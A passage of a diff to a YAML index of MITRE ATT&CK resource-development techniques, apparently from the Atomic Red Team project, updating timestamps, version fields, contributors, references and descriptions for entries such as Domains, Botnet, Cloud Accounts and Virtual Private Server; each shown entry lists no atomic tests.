         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -58329,7 +59009,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -58345,8 +59025,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -58368,7 +59046,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -58388,8 +59066,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -58428,7 +59104,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -58449,8 +59125,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -58480,7 +59154,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -58517,8 +59191,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -58540,7 +59212,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -58562,8 +59234,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -58600,7 +59270,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -58622,8 +59292,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -58685,7 +59353,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -58707,7 +59374,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -58725,8 +59392,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -58761,7 +59426,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -58780,33 +59445,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -58816,10 +59479,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -58827,9 +59499,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -58880,11 +59551,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -58897,7 +59567,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -58932,22 +59602,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -58968,7 +59641,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -59007,6 +59680,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -59062,7 +59739,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -59120,7 +59796,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -59200,7 +59875,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -59260,7 +59934,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -59282,7 +59955,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -59301,42 +59974,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -59345,22 +59986,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -59374,7 +60046,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -59461,11 +60133,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -59525,7 +60196,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -59567,7 +60237,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -59582,7 +60252,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
